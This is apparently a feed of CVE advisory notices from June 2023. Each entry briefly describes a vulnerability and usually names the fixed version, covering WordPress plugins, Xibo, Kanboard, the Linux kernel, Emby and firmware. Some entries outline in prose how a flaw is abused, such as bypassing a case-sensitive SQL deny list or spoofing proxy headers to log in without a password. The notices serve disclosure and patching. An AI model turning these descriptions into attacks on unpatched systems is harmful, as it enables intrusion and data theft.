| 2023-06-06 10:58:20 |
🚨 CVE-2022-40536Transient DOS due to improper authentication in modem while receiving plain TLB OTA request message from network.🎖@cveNotify |
|
| 2023-06-06 10:58:19 |
🚨 CVE-2022-40538Transient DOS due to reachable assertion in modem while processing sib with incorrect values from network.🎖@cveNotify |
|
| 2023-06-06 10:58:18 |
🚨 CVE-2023-21628Memory corruption in WLAN HAL while processing WMI-UTF command or FTM TLV1 command.🎖@cveNotify |
|
| 2023-06-06 10:58:14 |
🚨 CVE-2023-21656Memory corruption in WLAN HOST while receiving an WMI event from firmware.🎖@cveNotify |
|
| 2023-06-06 10:58:13 |
🚨 CVE-2023-21657Memoru corruption in Audio when ADSP sends input during record use case.🎖@cveNotify |
|
| 2023-06-06 10:58:12 |
🚨 CVE-2023-21659Transient DOS in WLAN Firmware while processing frames with missing header fields.🎖@cveNotify |
|
| 2023-06-06 05:58:32 |
🚨 CVE-2018-25087A vulnerability classified as problematic was found in Arborator Server. This vulnerability affects the function start of the file project.cgi. The manipulation of the argument project leads to denial of service. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as cdbdbcbd491db65e9d697ab4365605fdfab1a604. It is recommended to apply a patch to fix this issue. VDB-230662 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-06 05:58:31 |
🚨 CVE-2017-20185** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Fuzzy SWMP. It has been rated as problematic. This issue affects some unknown processing of the file swmp.php of the component GET Parameter Handler. The manipulation of the argument theme leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 792bcab637cb8c3bd251d8fc8771512c5329a93e. It is recommended to apply a patch to fix this issue. The identifier VDB-230669 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-06 05:58:27 |
🚨 CVE-2023-2546The WP User Switch plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.2. This is due to incorrect authentication checking in the 'wpus_allow_user_to_admin_bar_menu' function with the 'wpus_who_switch' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2023-06-06 05:58:26 |
🚨 CVE-2023-32699MeterSphere is an open source continuous testing platform. Version 2.9.1 and prior are vulnerable to denial of service. ?The `checkUserPassword` method is used to check whether the password provided by the user matches the password saved in the database, and the `CodingUtil.md5` method is used to encrypt the original password with MD5 to ensure that the password will not be saved in plain text when it is stored. If a user submits a very long password when logging in, the system will be forced to execute the long password MD5 encryption process, causing the server CPU and memory to be exhausted, thereby causing a denial of service attack on the server. This issue is fixed in version 2.10.0-lts with a maximum password length.🎖@cveNotify |
|
| 2023-06-06 05:58:25 |
🚨 CVE-2021-31233SQL Injection vulnerability found in Fighting Cock Information System v.1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter.🎖@cveNotify |
|
| 2023-06-06 05:58:24 |
🚨 CVE-2015-10116A vulnerability classified as problematic has been found in RealFaviconGenerator Favicon Plugin up to 1.2.12 on WordPress. This affects the function install_new_favicon of the file admin/class-favicon-by-realfavicongenerator-admin.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.2.13 is able to address this issue. The identifier of the patch is 949a1ae7216216350458844f50a72f100b56d4e7. It is recommended to upgrade the affected component. The identifier VDB-230661 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-06 05:58:21 |
🚨 CVE-2023-33181Xibo is a content management system (CMS). Starting in version 3.0.0 and prior to version 3.3.5, some API routes will print a stack trace when called with missing or invalid parameters revealing sensitive information about the locations of paths that the server is using. Users should upgrade to version 3.3.5, which fixes this issue. There are no known workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-06-06 05:58:20 |
🚨 CVE-2023-33177Xibo is a content management system (CMS). A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. Customers who host their CMS with Xibo Signage have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running.🎖@cveNotify |
|
| 2023-06-06 05:58:19 |
🚨 CVE-2023-33178Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the `/dataset/data/{id}` API route inside the CMS starting in version 1.4.0 and prior to versions 2.3.17 and 3.3.5. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values in to the `filter` parameter. Values allowed in the filter parameter are checked against a deny list of commands that should not be allowed, however this checking was done in a case sensitive manor and so it is possible to bypass these checks by using unusual case combinations. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. There are no workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-06-06 05:58:15 |
🚨 CVE-2023-32696CKAN is an open-source data management system for powering data hubs and data portals. Prior to versions 2.9.9 and 2.10.1, the `ckan` user (equivalent to www-data) owned code and configuration files in the docker container and the `ckan` user had the permissions to use sudo. These issues allowed for code execution or privilege escalation if an arbitrary file write bug was available. Versions 2.9.9, 2.9.9-dev, 2.10.1, and 2.10.1-dev contain a patch.🎖@cveNotify |
|
| 2023-06-06 05:58:14 |
🚨 CVE-2023-32540In Advantech WebAccss/SCADA v9.1.3 and prior, there is an arbitrary file overwrite vulnerability, which could allow an attacker to overwrite any file in the operating system (including system files), inject code into an XLS file, and modify the file extension, which could lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-06-06 05:58:13 |
🚨 CVE-2023-2612Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu Linux kernel contained a race condition when handling inode locking in some situations. A local attacker could use this to cause a denial of service (kernel deadlock).🎖@cveNotify |
|
| 2023-06-06 00:58:40 |
🚨 CVE-2023-34102Avo is an open source ruby on rails admin panel creation framework. The polymorphic field type stores the classes to operate on when updating a record with user input, and does not validate them in the back end. This can lead to unexpected behavior, remote code execution, or application crashes when viewing a manipulated record. This issue has been addressed in commit `ec117882d` which is expected to be included in subsequent releases. Users are advised to limit access to untrusted users until a new release is made.🎖@cveNotify |
|
| 2023-06-06 00:58:39 |
🚨 CVE-2023-34103Avo is an open source ruby on rails admin panel creation framework. In affected versions some avo fields are vulnerable to Cross Site Scripting (XSS) when rendering html based content. Attackers do need form edit privilege in order to successfully exploit this vulnerability, but the results are stored and no specific timing is required. This issue has been addressed in commit `7891c01e` which is expected to be included in the next release of avo. Users are advised to configure CSP headers for their application and to limit untrusted user access as a mitigation.🎖@cveNotify |
|
| 2023-06-06 00:58:38 |
🚨 CVE-2022-3214Delta Industrial Automation's DIAEnergy, an industrial energy management system, is vulnerable to CWE-798, Use of Hard-coded Credentials. Versions prior to 1.9.03.009 have this vulnerability. Executable files could be uploaded to certain directories using hard-coded bearer authorization, allowing remote code execution.🎖@cveNotify |
|
| 2023-06-06 00:58:37 |
🚨 CVE-2013-10030A vulnerability, which was classified as problematic, has been found in Exit Box Lite Plugin up to 1.06 on WordPress. Affected by this issue is some unknown functionality of the file wordpress-exit-box-lite.php. The manipulation leads to information disclosure. The attack may be launched remotely. Upgrading to version 1.10 is able to address this issue. The name of the patch is fad26701addb862c51baf85c6e3cc136aa79c309. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230672.🎖@cveNotify |
|
| 2023-06-06 00:58:36 |
🚨 CVE-2022-48181An ErrorMessage driver stack-based buffer overflow vulnerability in BIOS of some ThinkPad models could allow an attacker with local access to elevate their privileges and execute arbitrary code.🎖@cveNotify |
|
| 2023-06-06 00:58:35 |
🚨 CVE-2022-48188A buffer overflow vulnerability in the SecureBootDXE BIOS driver of some Lenovo Desktop and ThinkStation models could allow an attacker with local access to elevate their privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-06-06 00:58:34 |
🚨 CVE-2023-24510On the affected platforms running EOS, a malformed DHCP packet might cause the DHCP relay agent to restart.🎖@cveNotify |
|
| 2023-06-06 00:58:30 |
🚨 CVE-2023-3027The grc-policy-propagator allows security escalation within the cluster. The propagator allows policies which contain some dynamically obtained values (instead of the policy apply a static manifest on a managed cluster) of taking advantage of cluster scoped access in a created policy. This feature does not restrict properly to lookup content from the namespace where the policy was created.🎖@cveNotify |
|
| 2023-06-06 00:58:29 |
🚨 CVE-2023-3079Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-06 00:58:28 |
🚨 CVE-2023-2704The BP Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.5. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.🎖@cveNotify |
|
| 2023-06-06 00:58:27 |
🚨 CVE-2021-21741There is a command execution vulnerability in a ZTE conference management system. As some services are enabled by default, the attacker could exploit this vulnerability to execute arbitrary commands by sending specific serialization command.🎖@cveNotify |
|
| 2023-06-05 22:58:52 |
🚨 CVE-2013-10029A vulnerability classified as problematic was found in Exit Box Lite Plugin up to 1.06 on WordPress. Affected by this vulnerability is the function exitboxadmin of the file wordpress-exit-box-lite.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. Upgrading to version 1.10 is able to address this issue. The patch is named fad26701addb862c51baf85c6e3cc136aa79c309. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230671.🎖@cveNotify |
|
| 2023-06-05 22:58:51 |
🚨 CVE-2020-19028*File Upload vulnerability found in Emlog EmlogCMS v.6.0.0 allows a remote attacker to gain access to sensitive information via the /admin/plugin.php function.🎖@cveNotify |
|
| 2023-06-05 22:58:50 |
🚨 CVE-2022-4569A local privilege escalation vulnerability in the ThinkPad Hybrid USB-C with USB-A Dock Firmware Update Tool could allow an attacker with local access to execute code with elevated privileges during the package upgrade or installation.🎖@cveNotify |
|
| 2023-06-05 22:58:49 |
🚨 CVE-2023-29629PrestaShop jmsthemelayout 2.5.5 is vulnerable to SQL Injection via ajax_jmsvermegamenu.php.🎖@cveNotify |
|
| 2023-06-05 22:58:45 |
🚨 CVE-2023-29630PrestaShop jmsmegamenu 1.1.x and 2.0.x is vulnerable to SQL Injection via ajax_jmsmegamenu.php.🎖@cveNotify |
|
| 2023-06-05 22:58:44 |
🚨 CVE-2023-29631PrestaShop jmsslider 1.6.0 is vulnerable to Incorrect Access Control via ajax_jmsslider.php.🎖@cveNotify |
|
| 2023-06-05 22:58:43 |
🚨 CVE-2023-31893Telefnica Brasil Vivo Play (IPTV) Firmware: 2023.04.04.01.06.15 is vulnerable to Denial of Service (DoS) via DNS Recursion.🎖@cveNotify |
|
| 2023-06-05 22:58:42 |
🚨 CVE-2023-33408Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file.🎖@cveNotify |
|
| 2023-06-05 22:58:41 |
🚨 CVE-2023-33409Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php.🎖@cveNotify |
|
| 2023-06-05 22:58:37 |
🚨 CVE-2023-33410Minical 1.0.0 and earlier contains a CSV injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on the Customer Name field in the Accounting module that is used to construct a CSV file.🎖@cveNotify |
|
| 2023-06-05 22:58:36 |
🚨 CVE-2023-34097hoppscotch is an open source API development ecosystem. In versions prior to 2023.4.5 the database password is exposed in the logs when showing the database connection string. Attackers with access to read system logs will be able to elevate privilege with full access to the database. Users are advised to upgrade. There are no known workarounds for this vulnerability. 🎖@cveNotify |
|
| 2023-06-05 22:58:35 |
🚨 CVE-2023-3111A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().🎖@cveNotify |
|
| 2023-06-05 22:58:34 |
🚨 CVE-2023-32233In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.🎖@cveNotify |
|
| 2023-06-05 22:58:33 |
🚨 CVE-2023-31436qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.🎖@cveNotify |
|
| 2023-06-05 22:58:29 |
🚨 CVE-2023-0386A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.🎖@cveNotify |
|
| 2023-06-05 22:58:28 |
🚨 CVE-2023-33968Kanboard is open source project management software that focuses on the Kanban methodology. Versions prior to 1.2.30 are subject to a missing access control vulnerability that allows a user with low privileges to create or transfer tasks to any project within the software, even if they have not been invited or the project is personal. The vulnerable features are `Duplicate to project` and `Move to project`, which both utilize the `checkDestinationProjectValues()` function to check his values. This issue has been addressed in version 1.2.30. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-06-05 22:58:27 |
🚨 CVE-2023-33969Kanboard is open source project management software that focuses on the Kanban methodology. A stored Cross site scripting (XSS) allows an attacker to execute arbitrary Javascript and any user who views the task containing the malicious code will be exposed to the XSS attack. Note: The default CSP header configuration blocks this javascript attack. This issue has been addressed in version 1.2.30. Users are advised to upgrade. Users unable to upgrade should ensure that they have a restrictive CSP header config.🎖@cveNotify |
|
| 2023-06-05 22:58:26 |
🚨 CVE-2023-33970Kanboard is open source project management software that focuses on the Kanban methodology. A vulnerability related to a `missing access control` was found, which allows a User with the lowest privileges to leak all the tasks and projects titles within the software, even if they are not invited or it's a personal project. This could also lead to private/critical information being leaked if such information is in the title. This issue has been addressed in version 1.2.30. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-06-05 20:58:26 |
🚨 CVE-2022-30130.NET Framework Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-05 20:58:25 |
🚨 CVE-2023-20884VMware Workspace ONE Access and VMware Identity Manager contain an insecure redirect vulnerability. An unauthenticated malicious actor may be able to redirect a victim to an attacker controlled domain due to improper path handling leading to sensitive information disclosure.🎖@cveNotify |
|
| 2023-06-05 20:58:24 |
🚨 CVE-2023-33245Minecraft through 1.19 and 1.20 pre-releases before 7 (Java) allow arbitrary file overwrite, and possibly code execution, via crafted world data that contains a symlink.🎖@cveNotify |
|
| 2023-06-05 20:58:20 |
🚨 CVE-2015-10115A vulnerability, which was classified as problematic, was found in WooSidebars Sidebar Manager Converter Plugin up to 1.1.1 on WordPress. This affects the function process_request of the file classes/class-woosidebars-sbm-converter.php. The manipulation leads to open redirect. It is possible to initiate the attack remotely. Upgrading to version 1.1.2 is able to address this issue. The patch is named a0efb4ffb9dfe2925b889c1aa5ea40b4abbbda8a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230655.🎖@cveNotify |
|
| 2023-06-05 20:58:19 |
🚨 CVE-2023-33183Calendar app for Nextcloud easily sync events from various devices with your Nextcloud. Some internal paths of the website are disclosed when the SMTP server is unavailable. It is recommended that the Calendar app is updated to 3.5.5 or 4.2.3🎖@cveNotify |
|
| 2023-06-05 20:58:18 |
🚨 CVE-2023-2981A vulnerability, which was classified as problematic, has been found in Abstrium Pydio Cells 4.2.0. This issue affects some unknown processing of the component Chat. The manipulation leads to basic cross site scripting. The attack may be initiated remotely. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-230213 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-05 20:58:15 |
🚨 CVE-2023-2983Privilege Defined With Unsafe Actions in GitHub repository pimcore/pimcore prior to 10.5.23.🎖@cveNotify |
|
| 2023-06-05 20:58:14 |
🚨 CVE-2023-2978A vulnerability was found in Abstrium Pydio Cells 4.2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Change Subscription Handler. The manipulation leads to authorization bypass. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-230210 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-05 20:58:13 |
🚨 CVE-2023-2970A vulnerability classified as problematic was found in MindSpore 2.0.0-alpha/2.0.0-rc1. This vulnerability affects the function JsonHelper::UpdateArray of the file mindspore/ccsrc/minddata/dataset/util/json_helper.cc. The manipulation leads to memory corruption. The name of the patch is 30f4729ea2c01e1ed437ba92a81e2fc098d608a9. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-230176.🎖@cveNotify |
|
| 2023-06-05 18:58:40 |
🚨 CVE-2023-33193Emby Server is a user-installable home media server which stores and organizes a user's media files of virtually any format and makes them available for viewing at home and abroad on a broad range of client devices. This vulnerability may allow administrative access to an Emby Server system, depending on certain user account settings. By spoofing certain headers which are intended for interoperation with reverse proxy servers, it may be possible to affect the local/non-local network determination to allow logging in without password or to view a list of user accounts which may have no password configured. Impacted are all Emby Server system which are publicly accessible and where the administrator hasn't tightened the account login configuration for administrative users. This issue has been patched in Emby Server Beta version 4.8.31 and Emby Server version 4.7.12.🎖@cveNotify |
|
| 2023-06-05 18:58:39 |
🚨 CVE-2023-2972Prototype Pollution in GitHub repository antfu/utils prior to 0.7.3.🎖@cveNotify |
|
| 2023-06-05 18:58:38 |
🚨 CVE-2023-33191Kyverno is a policy engine designed for Kubernetes. Kyverno seccomp control can be circumvented. Users of the podSecurity `validate.podSecurity` subrule in Kyverno 1.9.2 and 1.9.3 are vulnerable. This issue was patched in version 1.9.4.🎖@cveNotify |
|
| 2023-06-05 18:58:37 |
🚨 CVE-2015-10113A vulnerability classified as problematic was found in WooFramework Tweaks Plugin up to 1.0.1 on WordPress. Affected by this vulnerability is the function admin_screen_logic of the file wooframework-tweaks.php. The manipulation of the argument url leads to open redirect. The attack can be launched remotely. Upgrading to version 1.0.2 is able to address this issue. The identifier of the patch is 3b57d405149c1a59d1119da6e0bb8212732c9c88. It is recommended to upgrade the affected component. The identifier VDB-230653 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-05 18:58:36 |
🚨 CVE-2015-10114A vulnerability, which was classified as problematic, has been found in WooSidebars Plugin up to 1.4.1 on WordPress. Affected by this issue is the function enable_custom_post_sidebars of the file classes/class-woo-sidebars.php. The manipulation of the argument sendback leads to open redirect. The attack may be launched remotely. Upgrading to version 1.4.2 is able to address this issue. The patch is identified as 1ac6d6ac26e185673f95fc1ccc56a392169ba601. It is recommended to upgrade the affected component. VDB-230654 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-05 18:58:32 |
🚨 CVE-2023-33690SonicJS up to v0.7.0 allows attackers to execute an authenticated path traversal when an attacker injects special characters into the filename of a backup CMS.🎖@cveNotify |
|
| 2023-06-05 18:58:31 |
🚨 CVE-2023-33693A buffer overflow in EasyPlayerPro-Win v3.2.19.0106 to v3.6.19.0823 allows attackers to cause a Denial of Service (DoS) via a crafted XML file.🎖@cveNotify |
|
| 2023-06-05 18:58:30 |
🚨 CVE-2023-33733Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.🎖@cveNotify |
|
| 2023-06-05 18:58:29 |
🚨 CVE-2023-3109Cross-site Scripting (XSS) - Stored in GitHub repository admidio/admidio prior to 4.2.8.🎖@cveNotify |
|
| 2023-06-05 18:58:28 |
🚨 CVE-2023-32766Gitpod before 2022.11.3 allows XSS because redirection can occur for some protocols outside of the trusted set of three (vscode: vscode-insiders: jetbrains-gateway:).🎖@cveNotify |
|
| 2023-06-05 18:58:24 |
🚨 CVE-2023-33386MarsCTF 1.2.1 has an arbitrary file upload vulnerability in the interface for uploading attachments in the background.🎖@cveNotify |
|
| 2023-06-05 18:58:23 |
🚨 CVE-2023-33518emoncms v11 and later was discovered to contain an information disclosure vulnerability which allows attackers to obtain the web directory path and other information leaked by the server via a crafted web request.🎖@cveNotify |
|
| 2023-06-05 18:58:22 |
🚨 CVE-2023-33955Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0.🎖@cveNotify |
|
| 2023-06-05 18:58:21 |
🚨 CVE-2023-30601Privilege escalation when enabling FQL/Audit logs allows user with JMX access to run arbitrary commands as the user running Apache CassandraThis issue affects Apache Cassandra: from 4.0.0 through 4.0.9, from 4.1.0 through 4.1.1.WORKAROUNDThe vulnerability requires nodetool/JMX access to be exploitable, disable access for any non-trusted users.MITIGATIONUpgrade to 4.0.10 or 4.1.2 and leave the new FQL/Auditlog configuration property allow_nodetool_archive_command as false.🎖@cveNotify |
|
| 2023-06-05 18:58:20 |
🚨 CVE-2023-30571Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.🎖@cveNotify |
|
| 2023-06-05 18:58:16 |
🚨 CVE-2021-37845An issue was discovered in Citadel through webcit-932. A meddler-in-the-middle attacker can fixate their own session during the cleartext phase before a STARTTLS command (a violation of "The STARTTLS command is only valid in non-authenticated state." in RFC2595). This potentially allows an attacker to cause a victim's e-mail messages to be stored into an attacker's IMAP mailbox, but depends on details of the victim's client behavior.🎖@cveNotify |
|
| 2023-06-05 18:58:15 |
🚨 CVE-2021-27825A directory traversal vulnerability on Mercury MAC1200R devices allows attackers to read arbitrary files via a web-static/ URL.🎖@cveNotify |
|
| 2023-06-05 18:58:14 |
🚨 CVE-2020-29547An issue was discovered in Citadel through webcit-926. Meddler-in-the-middle attackers can pipeline commands after POP3 STLS, IMAP STARTTLS, or SMTP STARTTLS commands, injecting cleartext commands into an encrypted user session. This can lead to credential disclosure.🎖@cveNotify |
|
| 2023-06-05 18:58:13 |
🚨 CVE-2019-19791In LemonLDAP::NG (aka lemonldap-ng) before 2.0.7, the default Apache HTTP Server configuration does not properly restrict access to SOAP/REST endpoints (when some LemonLDAP::NG setup options are used). For example, an attacker can insert index.fcgi/index.fcgi into a URL to bypass a Require directive.🎖@cveNotify |
|
| 2023-06-05 18:58:12 |
🚨 CVE-2023-2808Mattermost fails to normalize UTF confusable characters when determining if a preview should be generated for a hyperlink, allowing an attacker to trigger link preview on a disallowed domain using a specially crafted link.🎖@cveNotify |
|
| 2023-06-05 17:58:15 |
🚨 CVE-2022-4946The Frontend Post WordPress Plugin WordPress plugin through 2.8.4 does not validate an attribute of one of its shortcode, which could allow users with a role as low as contributor to add a malicious shortcode to a page/post, which will redirect users to an arbitrary domain.🎖@cveNotify |
|
| 2023-06-05 17:58:14 |
🚨 CVE-2023-0545The Hostel WordPress plugin before 1.1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-06-05 17:58:13 |
🚨 CVE-2023-0900The Pricing Table Builder WordPress plugin through 1.1.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.🎖@cveNotify |
|
| 2023-06-05 15:58:32 |
🚨 CVE-2023-3086Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-05 15:58:31 |
🚨 CVE-2023-3084Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-05 15:58:30 |
🚨 CVE-2023-2298The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to, and including, 4.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-05 15:58:26 |
🚨 CVE-2023-2303The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.4. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-05 15:58:25 |
🚨 CVE-2023-2404The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-05 15:58:24 |
🚨 CVE-2023-2407The Event Registration Calendar By vcita plugin, versions up to and including 3.9.1, and Online Payments – Get Paid with PayPal, Square & Stripe plugin, for WordPress are vulnerable to Cross-Site Request Forgery. This is due to missing nonce validation in the ls_parse_vcita_callback() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-05 15:58:23 |
🚨 CVE-2023-2415The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to logout a vctia connected account which would cause a denial of service on the appointment scheduler.🎖@cveNotify |
|
| 2023-06-05 15:58:19 |
🚨 CVE-2023-3083Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-05 15:58:18 |
🚨 CVE-2023-2299The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the /wp-json/vcita-wordpress/v1/actions/auth REST-API endpoint in versions up to, and including, 4.2.10 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings.🎖@cveNotify |
|
| 2023-06-05 15:58:17 |
🚨 CVE-2023-2300The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-05 15:58:13 |
🚨 CVE-2023-2405The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.2. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-05 15:58:12 |
🚨 CVE-2023-3051The Page Builder by AZEXO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'azh_post' shortcode in versions up to, and including, 1.27.133 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-05 15:58:11 |
🚨 CVE-2023-3052The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_add_post', 'azh_duplicate_post', 'azh_update_post' and 'azh_remove_post' functions. This makes it possible for unauthenticated attackers to create, modify, and delete a post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-05 06:59:37 |
🚨 CVE-2023-34410An issue was discovered in Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.2. Certificate validation for TLS does not always consider whether the root of a chain is a configured CA certificate.🎖@cveNotify |
|
| 2023-06-05 06:59:36 |
🚨 CVE-2023-34408DokuWiki before 2023-04-04a allows XSS via RSS titles.🎖@cveNotify |
|
| 2023-06-05 06:59:32 |
🚨 CVE-2014-125105A vulnerability was found in Broken Link Checker Plugin up to 1.10.1 on WordPress. It has been declared as problematic. Affected by this vulnerability is the function options_page of the file core/core.php of the component Settings Page. The manipulation of the argument exclusion_list/blc_custom_fields leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.10.2 is able to address this issue. The name of the patch is 90615fe9b0b6f9e6fb254d503c302e53a202e561. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230659.🎖@cveNotify |
|
| 2023-06-05 06:59:31 |
🚨 CVE-2023-32334IBM Maximo Asset Management 7.6.1.2, 7.6.1.3 and IBM Maximo Application Suite 8.8.0 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 255074.🎖@cveNotify |
|
| 2023-06-05 06:59:30 |
🚨 CVE-2023-22862IBM Aspera Connect 4.2.5 and IBM Aspera Cargo 4.2.5 transmits authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. IBM X-Force ID: 244107.🎖@cveNotify |
|
| 2023-06-05 06:59:29 |
🚨 CVE-2023-27285IBM Aspera Connect 4.2.5 and IBM Aspera Cargo 4.2.5 is vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system. IBM X-Force ID: 248625.🎖@cveNotify |
|
| 2023-06-05 01:03:03 |
